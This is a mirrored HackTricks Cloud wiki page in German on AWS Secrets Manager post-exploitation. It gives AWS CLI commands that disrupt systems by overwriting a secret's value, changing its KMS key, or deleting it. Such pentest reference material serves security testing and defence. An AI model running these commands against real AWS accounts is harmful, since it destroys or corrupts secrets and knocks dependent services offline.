mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2025-12-31 15:05:44 -08:00
1.3 KiB
1.3 KiB
AWS - Secrets Manager Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
Secrets Manager
Für weitere Informationen siehe:
{{#ref}} ../aws-services/aws-secrets-manager-enum.md {{#endref}}
Secrets lesen
Die Secrets selbst sind sensible Informationen, siehe die Privesc-Seite, um zu lernen, wie man sie liest.
DoS Secret-Wert ändern
Durch das Ändern des Wertes des Secrets könntest du das gesamte System, das von diesem Wert abhängt, DoS.
Warning
Beachte, dass vorherige Werte ebenfalls gespeichert werden, sodass es einfach ist, zum vorherigen Wert zurückzukehren.
# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"
DoS KMS-Schlüssel ändern
aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE
DoS Löschen von Geheimnissen
Die minimale Anzahl an Tagen, um ein Geheimnis zu löschen, beträgt 7.
aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
{{#include ../../../banners/hacktricks-training.md}}